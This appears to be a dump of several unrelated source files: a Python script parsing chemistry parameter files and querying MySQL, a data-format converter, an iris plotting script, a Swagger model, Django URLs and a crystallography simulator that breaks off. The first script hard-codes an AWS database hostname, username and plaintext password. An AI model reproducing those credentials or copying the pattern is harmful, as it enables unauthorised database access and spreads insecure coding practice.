if "S" in line[0]:
new_array[new_array.index(line)][0] = "S"
return new_array
#for line in new_array:
# print ' '.join(map(str,line))
#counts and tallies up atoms from coordinate file
def get_chem_formula(file):
array=get_coord(file)
C=H=N=S=O=0
for i in array:
if 'O' in i[0]:
O+=1
if 'C' in i[0]:
C+=1
if 'N' in i[0]:
N+=1
if 'H' in i[0]:
H+=1
if 'S' in i[0]:
S+=1
formula={"C":int(C),"H":int(H), "N":int(N), "S":int(S), "O":int(O)}
chemicals=""
for j in formula:
if formula[j] != 0:
chemicals += j+ str(formula[j])
return chemicals
#extracts the full textfile
def get_parameters(file):
lines=[]
with open(file) as parameter:
for line in parameter:
lines.append(line)
return lines
"""
parameter=('h2o.efp')
#parameter=str(sys.argv[1])
#extract coords, chemical formula, and EFP parameter into string variables (coord_str, form, parm_str).
coord=get_coord(parameter)
#print(coord)
coord_str="\n".join(str(i) for i in coord)
form=get_chem_formula(parameter)
#print(form)
parm=get_parameters(parameter)
parm_str='\n'.join(parm)
#print(parm_str)
#insert parameters into tables
#columns: fragment, chemicalformula, coordinates, parameters
#all data must be read in as a string.
#print(type(parameter), type(form), type(coord_str), type(parm_str))
current_timestamp = datetime.datetime.now()
#tables = cur.execute("INSERT INTO SSI_sub(date,fragment,chemicalformula,coordinates,parameters) VALUES (%s,%s,%s,%s,%s);", (current_timestamp, parameter, form, coord_str, parm_str))
#print("execute result", tables)
#print(dir(cur))
#print(cur._warnings)
#db.commit()
"""
# In[20]:
def ensure_str(s):
if isinstance(s, str):
s = s.encode('utf-8')
return s
def query(string):
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
#string=str(sys.argv[1])
string="SELECT chemicalformula,coordinates FROM SSI_sub"
cur.execute(string)
entry=[]
for i in cur.fetchall():
entry.append(ensure_str(i[0]))
return entry
#print entry.append(ensure_str(i[3]))
#return entry
#print entry[3].strip("\n").replace('\"','').split('\n')[0]
"""
# In[100]:
cur.execute('TRUNCATE TABLE SSI_sub')
# In[10]:
get_coord(parameter)
# In[21]:
query('test')
"""
# In[24]:
def strip_text(text):
#strips the string of brackets and quotation marks for better readability
unwanted={"'":"", "[":"", "]":"", ",":"", "b":" "}
for i, j in unwanted.items():
text=text.replace(i,j)
return text
def query_return_coord(parameter):
coord=[]
coord=query('parameter')
return query('parameter')
for i in coord:
return strip_text(str(i))
#return strip_text(str(i))
#return " ".join(i).replace("'", " ").replace("]", "").replace("[","").replace(",","")
"""
# In[25]:
query_return_coord('parameter')
# In[7]:
get_multipoles(parameter)
"""
# In[8]:
def get_multipoles(file):
monopoles=dipoles=quadrupoles=octupoles=[]
multipoles={'MONOPOLES':monopoles, 'DIPOLES':dipoles, 'QUADRUPOLES':quadrupoles, 'OCTUPOLES':octupoles}
copy=False
with open(file) as parameter:
for multipole_coord, multipole_type in multipoles.items():
for line in parameter:
if line.strip() in multipoles:
copy = True
elif line.strip() == 'STOP':
copy = False
elif copy:
multipole_type.append(line)
print('MONOPOLES')
return multipoles.get('MONOPOLES')
"""
# In[9]:
get_multipoles(parameter)
"""
# In[69]:
def get_polarizable_pts(file):
polarizable_pts=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'POLARIZABLE POINTS':
break
for line in parameter:
if line.strip() == 'STOP':
break
polarizable_pts.append(line)
return polarizable_pts
# In[70]:
def get_dynamic_polarizable_pts(file):
dynamic_polarizable_pts=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'DYNAMIC POLARIZABLE POINTS':
break
for line in parameter:
if line.strip() == 'STOP':
break
dynamic_polarizable_pts.append(line)
return dynamic_polarizable_pts
# In[71]:
def get_projection_basis_set(file):
projection_basis_set=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'DYNAMIC POLARIZABLE POINTS':
break
for line in parameter:
if line.strip() == 'STOP':
break
projection_basis_set.append(line)
return projection_basis_set
# In[72]:
def get_multiplicity(file):
import re
multiplicity=[]
with open(file) as parameter:
for line in parameter:
if 'MULTIPLICITY' in line.strip():
multiplicity.append(float(re.split('\s+',line)[2]))
return multiplicity
"""
# In[73]:
get_multiplicity(parameter)
"""
# In[76]:
def get_projection_wavefunction(file):
import re
copy=False
projection_wavefunction=[]
with open(file) as parameter:
for line in parameter:
if 'PROJECTION WAVEFUNCTION' in line.strip():
copy=True
projection_wavefunction.append(float(re.split('\s+',line)[3]))
projection_wavefunction.append(float(re.split('\s+',line)[4]))
elif line.strip() == 'FOCK MATRIX ELEMENTS':
copy = False
elif copy:
projection_wavefunction.append(line)
return projection_wavefunction
"""
# In[77]:
get_projection_wavefunction(parameter)
"""
# In[78]:
def get_fock_matrix(file):
import re
copy=False
fock_matrix=[]
with open(file) as parameter:
for line in parameter:
if 'FOCK MATRIX ELEMENTS' in line.strip():
copy=True
elif line.strip() == 'LMO CENTROIDS':
copy = False
elif copy:
fock_matrix.append(line)
return fock_matrix
"""
# In[79]:
get_fock_matrix(parameter)
"""
# In[80]:
def get_lmo_centroids(file):
copy=False
lmo_centroids=[]
with open(file) as parameter:
for line in parameter:
if 'LMO CENTROIDS' in line.strip():
copy=True
elif line.strip() == 'STOP':
copy = False
elif copy:
lmo_centroids.append(line)
return lmo_centroids
# In[81]:
def get_canonvec(file):
import re
copy=False
canonvec=[]
with open(file) as parameter:
for line in parameter:
if 'CANONVEC' in line.strip():
copy=True
canonvec.append(float(re.split('\s+',line)[2]))
canonvec.append(float(re.split('\s+',line)[3]))
elif line.strip() == 'CANONFOK':
copy = False
elif copy:
canonvec.append(line)
return canonvec
"""
# In[82]:
get_canonvec(parameter)
"""
# In[83]:
def get_canonfok(file):
copy=False
canonfok=[]
with open(file) as parameter:
for line in parameter:
if 'CANONFOK' in line.strip():
copy=True
elif line.strip() == 'STOP':
copy = False
elif copy:
canonfok.append(line)
return canonfok
# In[84]:
def get_screen3(file):
import re
copy=False
screen3=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN3' in line.strip():
copy=True
screen3.append(float(re.split('\s+',line)[2]))
screen3.append(float(re.split('\s+',line)[3]))
elif line.strip() == 'SCREEN3':
copy = False
elif copy:
screen3.append(line)
return screen3
"""
# In[85]:
get_screen3(parameter)
"""
# In[86]:
def get_screen2(file):
import re
copy=False
screen2=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN2' in line.strip():
copy=True
screen2.append(re.split('\s+',line)[3])
elif line.strip() == 'STOP':
copy = False
elif copy:
screen2.append(line)
return screen2
"""
# In[87]:
get_screen2(parameter)
"""
# In[40]:
def get_screen(file):
import re
copy=False
screen=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN (' in line.strip():
copy=True
screen.append(re.split('\s+',line)[3])
elif line.strip() == 'STOP':
copy = False
elif copy:
screen.append(line)
return screen
"""
# In[41]:
type(get_screen(parameter))
"""
# In[35]:
def query_2(get_coordinates):
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
#string=str(sys.argv[1])
string="SELECT chemicalformula FROM SSI_sub"
cur.execute(string)
entry=[]
for (chemicalformula) in cur:
print("{}".format(chemicalformula))
cur.close()
db.close()
"""
# In[36]:
query_2('test')
"""
|
[
"jcheoh@purdue.edu"
] |
jcheoh@purdue.edu
|
81fc1f0cf7bd713acd89b9c9ac98598da2f45ba8
|
49ed844c2f132e0bc64b3e1b7499823d0e173dc0
|
/code/DataConverter.py
|
d040ed44bb11f562004d053c11254cee1be9cfb7
|
[] |
no_license
|
chihming/DataTransformer
|
6f6c3c465e5f2c9d0718b169fc9a872342b07552
|
030ae1db018cdc6cda6ac13d2c47071ea89d131f
|
refs/heads/master
| 2020-12-30T09:57:47.910862
| 2017-03-08T08:21:35
| 2017-03-08T08:21:35
| 26,474,964
| 3
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,077
|
py
|
from code.FeatureMaker import FeatureMaker
from code.Encoder import Encoder
from random import shuffle
from collections import defaultdict
class DataConverter:
logger = None
fmaker = None
encoder = Encoder()
def DumpMapping(self, mfile):
self.encoder.dump_map(mfile)
def __init__(self, logger):
self.logger = logger
self.fmaker = FeatureMaker(logger)
pass
def JoinData(self, infile, relfile, sep, rsep, header, join_column):
"""
Join data features
"""
self.logger.info("Load data")
indata = [ line.rstrip().split(sep) for line in open(infile[0]) ]
dataout = indata[:]
dmap = {}
for e, columns in enumerate(join_column):
self.logger.info("Join columns: %s" % columns)
dmap.clear()
tcolumn, jcolumn = columns.split(':')
tcolumn = int(tcolumn)
jcolumn = int(jcolumn)
reldata = [ line.rstrip().split(rsep) for line in open(relfile[e]) ]
for line in reldata:
key = line[jcolumn]
del line[jcolumn]
dmap[key] = line
dataout = [ a + b for a, b in zip( dataout, [dmap[key] for key in zip(*(indata))[tcolumn]] ) ]
dataout = [ sep.join(cdata) for cdata in dataout ]
return dataout
def SplitData(self, infile, target_column, sep, header, ratio, method):
"""
Split data into training / testing data
"""
self.logger.info("Get unique targets")
target_unique = {}
with open(infile[0]) as f:
for line in f:
target = line.rstrip().split(sep)[target_column]
target_unique[target] = 1
target_unique = target_unique.keys()[:]
self.logger.info("split target")
shuffle(target_unique)
cut_off = int( len(target_unique) * float(ratio[0]) )
target_train = { t:1 for t in target_unique[:cut_off] }
#target_test = { t:1 for t in target_unique[cut_off:] }
self.logger.info("total targets: %d, pure train targets: %d" % (len(target_unique), len(target_unique) * float(ratio[0])))
self.logger.info("split data")
datamap = defaultdict(list)
dataoutTrain = []
dataoutTest = []
with open(infile[0]) as f:
for line in f:
target = line.rstrip().split(sep)[target_column]
datamap[target].append(line.rstrip())
thres = 10
self.logger.info("filter data less than %d" % thres)
if method == 'random': #FIXME not random?
for target in datamap:
if len(datamap[target]) < thres: continue
if target in target_train:
for log in datamap[target]:
dataoutTrain.append(log)
else:
cut_off = int( round( len(datamap[target]) * float(ratio[2]), 0) )
_datamap = datamap[target][:]
shuffle(_datamap)
for log in _datamap[:cut_off]:
dataoutTrain.append(log)
for log in _datamap[cut_off:]:
dataoutTest.append(log)
return dataoutTrain, dataoutTest
def DatatoLib(self, infile, outfile, target_column, sep, msep, offset, header, alpha, normalized, c_columns, n_columns, knn, process):
"""
Convert CSV data to libSVM/libFM format
"""
self.logger.info("Load data")
self.encoder.set_offset(offset)
data = []
k_columns = []
for tp in knn:
k, acolumn, bcolumn = tp.split(':')
k_columns.append(int(acolumn))
all_columns = c_columns + n_columns + k_columns
unique_fea = {}
for idx in c_columns: unique_fea[idx] = {}
for idx in n_columns: unique_fea[idx] = {}
for idx in k_columns: unique_fea[idx] = {}
for fname in infile:
self.logger.info("Get unique feature from '%s'" % (fname))
with open(fname, 'r') as f:
if header: next(f)
for line in f:
line = line.rstrip('\n').split(sep)
for idx in all_columns:
unique_fea[idx][line[idx]] = 1
self.logger.info("Encode data")
for idx in c_columns:
label = 'Cat ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
for idx in n_columns:
label = 'Num ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
for idx in k_columns:
label = 'Sim ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
# KNN
nn = {}
if knn is not None:
self.logger.info("Compute Similarity Feature")
for tp in knn:
tempnn = {}
k, acolumn, bcolumn = map(int, tp.split(':'))
nn[acolumn] = {}
for a in unique_fea[acolumn].keys():
tempnn[a] = []
with open(infile[0]) as f:
if header: next(f)
for line in f:
line = line.rstrip().split(sep)
tempnn[ line[acolumn] ].append(line[bcolumn])
self.logger.info("Get column %d similarities based on column %d" % (acolumn, bcolumn))
nn[acolumn] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
# Data Transforming
converted = []
dataout = []
out = []
for ifname, ofname in zip(infile, outfile):
self.logger.info("Data Transforming on '%s' to '%s'" % (ifname, ofname))
del converted[:]
with open(ifname, 'r') as f:
if header: next(f)
for line in f:
del out[:]
line = line.rstrip('\n').split(sep)
out.append(line[target_column])
for idx in c_columns:
label = 'Cat ' + str(idx)
out.append( self.encoder.fit_categorical( line[idx], msep, label=label ) )
for idx in n_columns:
label = 'Num ' + str(idx)
out.append( self.encoder.fit_numeric( line[idx], label=label ) )
for idx in k_columns:
label = 'Sim ' + str(idx)
fea_vec = nn[idx][line[idx]] if line[idx] in nn[idx] else ""
out.append( self.encoder.fit_feature( fea_vec, msep='|', label=label, normalized=normalized ) )
converted.append("%s" % (" ".join(out)))
self.logger.info("Write encoded data to '%s'" % (ofname))
with open(ofname, 'w') as f:
f.write("%s\n" % ("\n".join(converted)))
def DatatoRel(self, infile, relfile, target_column, rtarget_column, sep, rsep, msep, offset, header, alpha, normalized, c_columns, n_columns, knn, process):
"""
Convert data to relational data format
"""
self.encoder.set_offset(offset)
self.logger.info("Load data")
Train = None
if len(knn) > 0:
Train = [ line.split(sep) for line in open(infile[0]) ]
Test = [ line.split(sep) for line in open(infile[0]) ]
targetTrain = [ line.rstrip('\n').split(sep)[target_column] for line in open(infile[0]) ]
targetTest = [ line.rstrip('\n').split(sep)[target_column] for line in open(infile[1]) ]
if header:
keymap = { value:str(idx) for idx, value in enumerate( [line.rstrip('\n').split(rsep)[rtarget_column] for line in open(relfile)] , -1) }
else:
keymap = { value:str(idx) for idx, value in enumerate( [line.rstrip('\n').split(rsep)[rtarget_column] for line in open(relfile)] ) }
datamapTrain = [ keymap[v] if v in keymap else keymap['-1'] for v in targetTrain ]
datamapTest = [ keymap[v] if v in keymap else keymap['-1'] for v in targetTest ]
data = [ line.rstrip('\n').split(rsep) for line in open(relfile) ]
dim = len(data[0])
nn = {}
k_columns = []
if len(knn) > 0:
k_columns = [ int(rtarget_column) ]
if header:
header = data[0]
datamapTrain = datamapTrain[1:]
datamapTest = datamapTest[1:]
data = data[1:]
self.logger.info("Encode data")
for idx in range(dim):
if idx in c_columns:
label = 'Cat ' + str(idx)
self.encoder.encode_categorical( set(zip(*data)[idx]), msep=msep, label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
elif idx in n_columns:
label = 'Num ' + str(idx)
self.encoder.encode_numeric( set(zip(*data)[idx]), label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
if idx in k_columns:
label = 'Sim ' + str(rtarget_column)
self.encoder.encode_categorical( set(zip(*(data))[idx]), msep=msep, label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
# KNN
if len(knn) > 0:
self.logger.info("Compute Similarity Feature")
#Train = [ record for record in Train if float(record[3]) >= 3.]
for tp in knn:
tempnn = {}
k, acolumn, bcolumn = tp.split(':')
k = int(k)
acolumn = int(acolumn)
bcolumn = int(bcolumn)
nn[rtarget_column] = {}
for a in set(list(zip(*(Train))[acolumn])):
tempnn[a] = []
for a, b in zip( list(zip(*(Train))[acolumn]), list(zip(*(Train))[bcolumn]) ):
tempnn[a].append(b)
self.logger.info("Get column %d similarities based on column %d" % (acolumn, bcolumn))
#nn[acolumn] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
nn[rtarget_column] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
self.logger.info("Transform data")
converted = [ ["0" for i in range(len(data))] ]
for idx in range(dim):
if idx in c_columns:
label = 'Cat ' + str(idx)
converted.append( self.encoder.fit_categorical( zip(*data)[idx], msep, label=label ) )
elif idx in n_columns:
label = 'Num ' + str(idx)
converted.append( self.encoder.fit_numeric( zip(*data)[idx], label=label ) )
if idx in k_columns:
label = 'Sim ' + str(rtarget_column)
fea_matrix = [ nn[idx][fea] if fea in nn[idx] else "" for fea in zip(*data)[idx] ]
converted.append( self.encoder.fit_feature( fea_matrix, msep='|', label=label, normalized=normalized ) )
dataout = [ "%s" % (" ".join(cdata)) for cdata in zip(*converted) ]
return dataout, datamapTrain, datamapTest, self.encoder.get_max_index()-1
|
[
"changecandy@gmail.com"
] |
changecandy@gmail.com
|
675c71140cbfcee82e787b7f764cf0d7d3aed625
|
102b3420849d7d60c023714002fd44368baef40a
|
/firstPy/数据挖掘/first.py
|
664e8cb4699446349408e643d78fe499ea65cb1d
|
[] |
no_license
|
cash2one/python_code
|
d5a13e8b7c875a6922de3c9649305d77e792c7d8
|
2513a1b6152f4b6e6c9d9c66983d2b70658d4118
|
refs/heads/master
| 2021-01-13T03:45:55.847571
| 2016-08-26T08:44:24
| 2016-08-26T08:44:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
#ecoding:utf8
import urllib2
url = 'http://aima.cs.berkeley.edu/data/iris.csv'
#u = urllib2.urlopen(url).read()
dir = '/Users/bjhl/Documents/data_mining/'
filename = 'iris.csv'
# with open(dir+filename,'w') as fw:
# fw.write(u)
# fw.flush()
#print u
from numpy import genfromtxt, zeros
#read the first 4 columns
#data = genfromtxt(url,delimiter=',',usecols=(0,1,2,3))
data = genfromtxt(dir+filename,delimiter=',',usecols=(0,1,2,3))
print data.shape
print type(data)
# read the fifth column
#target = genfromtxt(url,delimiter=',',usecols=(4),dtype=str)
target = genfromtxt(dir+filename,delimiter=',',usecols=(4),dtype=str)
print target.shape
print type(target)
# from pylab import plot,show
# plot(data[target=='setosa',0],data[target=='setosa',2],'bo')
# plot(data[target=='versicolor',0],data[target=='versicolor',2],'ro')
# plot(data[target=='virginica',0],data[target=='virginica',2],'go')
# show()
from pylab import figure, subplot, hist, xlim, show
xmin = min(data[:,0])
xmax = max(data[:,0])
print xmax,xmin
print figure()
subplot(411) # distribution of the setosa class (1st, on the top)
hist(data[target=='setosa',0],color='b',alpha=.7)
xlim(xmin,xmax)
subplot(412) # distribution of the versicolor class (2nd)
hist(data[target=='versicolor',0],color='r',alpha=.7)
xlim(xmin,xmax)
subplot(413) # distribution of the virginica class (3rd)
hist(data[target=='virginica',0],color='g',alpha=.7)
xlim(xmin,xmax)
subplot(414) # global histogram (4th, on the bottom)
hist(data[:,0],color='y',alpha=.7)
xlim(xmin,xmax)
show()
|
[
"bjhl@WHYF-2788.local"
] |
bjhl@WHYF-2788.local
|
7bd52c55aa838536139a4338c6a12b2e5810d847
|
52052b8f513b64b62a115b1de1f1727398fa9e77
|
/zip.py
|
356a2745ca342e5f76aa9593554a9e55d1d07b39
|
[] |
no_license
|
vlakhani28/Python-Learn
|
eb22a2209307f7ac8725e8a70c14eca860c3bcea
|
4785544384432c7cf42de96f5b865d3948b9fb7b
|
refs/heads/master
| 2020-11-26T09:22:44.868343
| 2019-12-30T05:06:10
| 2019-12-30T05:06:10
| 226,358,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
a = ("Hi","Bye")
b = ("VL","Meet you","Soon")
print(tuple(zip(a,b)))
|
[
"noreply@github.com"
] |
vlakhani28.noreply@github.com
|
9a4bf24da3b560bcf2a827254ecb212a9cd43d22
|
d8083b945e1527f66ecdd321961a4453b8f068b1
|
/swagger_server/models/inline_response200.py
|
0a9b6d202cdaad66150263d15a2dbda6465c2745
|
[
"Apache-2.0"
] |
permissive
|
SJoshua/Time-Capsule-Post-2019-API
|
762fcbb97071b1ee07095f1619242198e789a014
|
0e613c71c8e1adf0521ddcc4ff9bde2fd8f39193
|
refs/heads/master
| 2020-09-24T09:55:57.172383
| 2019-12-04T14:39:18
| 2019-12-04T14:39:18
| 225,734,275
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class InlineResponse200(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, participated: bool=None): # noqa: E501
"""InlineResponse200 - a model defined in Swagger
:param participated: The participated of this InlineResponse200. # noqa: E501
:type participated: bool
"""
self.swagger_types = {
'participated': bool
}
self.attribute_map = {
'participated': 'participated'
}
self._participated = participated
@classmethod
def from_dict(cls, dikt) -> 'InlineResponse200':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The inline_response_200 of this InlineResponse200. # noqa: E501
:rtype: InlineResponse200
"""
return util.deserialize_model(dikt, cls)
@property
def participated(self) -> bool:
"""Gets the participated of this InlineResponse200.
:return: The participated of this InlineResponse200.
:rtype: bool
"""
return self._participated
@participated.setter
def participated(self, participated: bool):
"""Sets the participated of this InlineResponse200.
:param participated: The participated of this InlineResponse200.
:type participated: bool
"""
self._participated = participated
|
[
"JoshuaSRKF@gmail.com"
] |
JoshuaSRKF@gmail.com
|
f6956a6c75f50380e9dd6207ef59e2de012eb3a2
|
1d88bd336207a12d527ecdff4291ec228de21ed4
|
/rangoapp/urls.py
|
907a2ffc44651be5ef6b2ad5482ec7ca25651331
|
[] |
no_license
|
fonque/rango
|
954e5944c4ac17ec9b75852333a1d38a1b6789e3
|
2038c6dbc1130e21ee0e12ab5f218b1896126149
|
refs/heads/master
| 2021-01-22T23:48:09.552799
| 2014-04-08T13:10:50
| 2014-04-08T13:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django.conf.urls import patterns, url
from rangoapp import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^about/', views.about, name='about'),
)
|
[
"fonque@gmail.com"
] |
fonque@gmail.com
|
a9a26c07e3165bc9c40e52bc1c5abc22f7313e9e
|
57bd9124c070a25a649a8859f010ec26216c4535
|
/utils/reflection_counter/prep_stills_image.v5-1.py
|
c19a227a75bf74d1e83457067b6047e3df70c409
|
[
"Apache-2.0"
] |
permissive
|
beamline-i24/Serial_processing_scripts
|
522812b2964cbaa5a2fe3c0a6483df5cb691af0e
|
ca97e3cd7ba991636171eafa126dc6e1aa4c53cc
|
refs/heads/master
| 2020-03-21T05:56:28.491220
| 2018-06-28T22:41:52
| 2018-06-28T22:41:52
| 138,189,548
| 0
| 0
|
Apache-2.0
| 2018-06-28T22:41:53
| 2018-06-21T15:32:51
|
Python
|
UTF-8
|
Python
| false
| false
| 8,846
|
py
|
#modules
import pandas as pd
import numpy as np
import math as m
import timeit
import itertools
from cctbx import miller
from cctbx import crystal
import matplotlib.pyplot as plt
import pylab
import re
#my modules
import xtal_trig_1 as trig
import unit_cell_check as check
import space_group as sp
import pdb_header_scrub as pdb
#functions
def check_xtal_input( spacegroup, a, b, c, alpha, beta, gamma ):
try:
if sp.lattice(spacegroup) == "cubic":
return check.cubic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "tetragonal":
return check.tetragonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "hexagonal":
return check.hexagonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "trigonal":
return check.trigonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "orthorhombic":
return check.orthorhombic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "monoclinic":
return check.monoclinic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "triclinic":
return check.triclinic( a, b, c, alpha, beta, gamma )
else:
raise ValueError, "this does not appear to be a known spacegroup"
except ValueError, value:
print value
def gen_hkl( spacegroup, a, b, c, alpha, beta, gamma, d_min ):
# generate hkls based on spacegroup, unit cell dimensions and d_min
ms = miller.build_set(
crystal_symmetry=crystal.symmetry(
space_group_symbol = "P1",
unit_cell = ( a, b, c, alpha, beta, gamma ) ),
anomalous_flag = True,
d_min = d_min,
d_max = 50,
)
hkl_list = list( ms.indices() )
# put hkl_list in a pandas dataframe
cols = [ "h", "k", "l" ]
df = pd.DataFrame( hkl_list, columns=cols )
return df
def scale_lattice( spacegroup, a, b, c, alpha, beta, gamma, lattice ):
# scaler for spacegroup
a_star = trig.operators( a, b, c, alpha, beta, gamma, "a*" )
b_star = trig.operators( a, b, c, alpha, beta, gamma, "b*" )
c_star = trig.operators( a, b, c, alpha, beta, gamma, "c*" )
scaler = np.array( [ a_star, b_star, c_star ] )
list_hkl = np.multiply( lattice, scaler )
return list_hkl
def omega_d( h, k, l, wavelength, variable ):
#import hkls as array
hkl = np.array( [ h, k, l ] )
# transpose array
hkl = np.transpose( hkl )
# calculate length of vector
d_star = np.linalg.norm( hkl, axis=1 )
# calculate ewald omega for vector of given length
omega = np.degrees( np.arcsin( ( d_star * wavelength ) / 2 ) )
if variable == "d_star":
return d_star
elif variable == "omega":
return omega
def apply_d_omega( lattice, wavelength ):
# hkl array
df = lattice
# calculate ewald omegas using omega function
df[ "ewald_omega" ] = omega_d( df[ "h" ].values, df[ "k" ].values, df[ "l" ].values, wavelength, "omega" )
return df
def det_vector_generator():
# generate random varibles for circle
phi = np.random.uniform( 0, 2*m.pi )
cos_theta = np.random.uniform( -1, 1 )
theta = m.acos( cos_theta )
r = 1
# generate x,y,z coordinates
x = r * m.sin( theta) * m.cos( phi )
y = r * m.sin( theta) * m.sin( phi )
z = r * m.cos( theta )
det = np.array( [ [ x, y, z ] ] )
return det
def det_hkl_dot( det, h, k, l ):
# (axb)/(a.b) = tan omega
# import hkls as array
hkl = np.array( [ h, k, l ] )
# calculate dot product between det vector and hkl
dot = np.dot( det, hkl )
# transpose hkl to vectorise np.cross
hkl = np.transpose( hkl )
# cross product vector of det vector and hkl
cross = np.cross( det, hkl )
# mod of cross
cross_mod = np.linalg.norm( cross, axis=1 )
# transpose cross_mod to vectorise np.arctan2
cross_mod = np.transpose( cross_mod )
# anti_omega = angle between det vector and hkl
anti_omega = np.arctan2( cross_mod, dot )
# tranpose for vectorisation
anti_omega = np.transpose( anti_omega )
# omega = anit omega - 90
omega = 90 - np.degrees( anti_omega )
return abs( omega )
def spot_hist_plt( spot_df ):
frequency = spot_df[ "spots" ].values
plt.hist( frequency )
plt.title( "frequency of bragg reflections per image" )
plt.xlabel( "no. of bragg candidates per image" )
plt.ylabel( "frequency" )
pylab.show()
def hkl_plot( df_hkl ):
df = pd.DataFrame()
bins = 50
bin_range, labels = pd.cut( df_hkl[ "d_star" ], bins=bins, retbins=True )
df_hkl[ "bin" ] = pd.cut( df_hkl[ "d_star" ], bins=len( labels ), labels=labels )
df[ "frequency" ] = df_hkl.groupby( "bin" )[ "frequency" ].mean()
frequency = df[ "frequency" ].values
d_hkl = df.index.values
plt.scatter( d_hkl, frequency )
plt.title( "frequency of bragg reflections per image" )
plt.xlabel( r'$\sin\theta/2\lambda$' )
plt.ylabel( "frequency" )
pylab.show()
def image_max( spacegroup, ano ):
m = sp.m( spacegroup )
max = 562.5 / m
#max = 100 / m
try:
if ano == "True":
return max
elif ano == "False":
return max / 2
else:
raise ValueError, "ano must be either True or False"
except ValueError:
print value
def main( wavelength ):
# check input spacegroup and unit cell dimensions make sense
if check_xtal_input( spacegroup, a, b, c, alpha, beta, gamma ) == True:
# define precision when calculating hkls on the ewald sphere 0 = no decimal place, 1 = 1 decimal place etc
precision = 3
mosaicity = 0.02
# generate hkl lattice
print "generating hkls"
df_hkl = gen_hkl( spacegroup, a, b, c, alpha, beta, gamma, d_min )
# scale hkls
print "scale hkls"
df = scale_lattice( spacegroup, a, b, c, alpha, beta, gamma, df_hkl )
# generate omegas
print "calculating ewald omegas"
df = apply_d_omega( df, wavelength )
# variable for while loop
df[ "frequency" ] = 0
spots = 0
images = 0
mean = df[ "frequency" ].mean()
max = image_max( spacegroup, ano )
print max
spot_no_2 = np.array( [ [ 0 ] ] )
# returns output of hkl where the detector vector omega = ewald omega
while ( mean < max ):
#print "new image"
# new detector vector
det_vector = det_vector_generator()
# creates a detector/hkl* omega column
df[ "det_hkl_omega" ] = det_hkl_dot( det_vector, df[ "h" ].values, df[ "k" ].values, df[ "l" ].values )
# compared ewald omega and detect omega - write +1 to frequency column
df = df.round( { "ewald_omega" : precision, "det_hkl_omega" : precision } )
#
ewald_low = df.ewald_omega - mosaicity
ewald_high = df.ewald_omega + mosaicity
# increase hkls hit by 1
df[ "frequency_1" ] = np.where( ( ewald_low <= df.det_hkl_omega ) & ( df.det_hkl_omega <= ewald_high ), 1, 0 )
df[ "frequency" ] = df[ "frequency" ] + df[ "frequency_1" ]
# print outputs for while loop
images = images + 1
mean = df[ "frequency" ].mean()
spots = df[ "frequency_1" ].sum()
# while loop house keeping
print "image = {0}, mean = {1}, spots on image = {2}".format( images, mean, spots )
spot_no = np.array( [ [ spots ] ] )
spot_no_2 = np.concatenate( ( spot_no_2, spot_no ), axis=0 )
spot_df = pd.DataFrame( spot_no_2, columns=[ "spots" ] )
# plot hist of spots
spot_hist_plt( spot_df )
spot_df.to_csv( "spot_hist.txt", sep="\t", mode="w" )
#hkl_plot( df_hkl )
return images
def looper():
cycle = 0
list = np.array( [ [ ] ] )
while ( cycle < 1 ):
print "cycle {0}".format( cycle )
images = main( wavelength )
list_1 = np.array( [ [ images ] ] )
list = np.concatenate( ( list, list_1 ), axis=1 )
cycle = cycle + 1
list = np.transpose( list )
df = pd.DataFrame( list, columns=[ "no. of images" ] )
print df
spacegroup = "P213"
a = 96.5
b = 96.5
c = 96.5
alpha = 90
beta = 90
gamma = 90
wavelength = 0.9686
energy = 12800
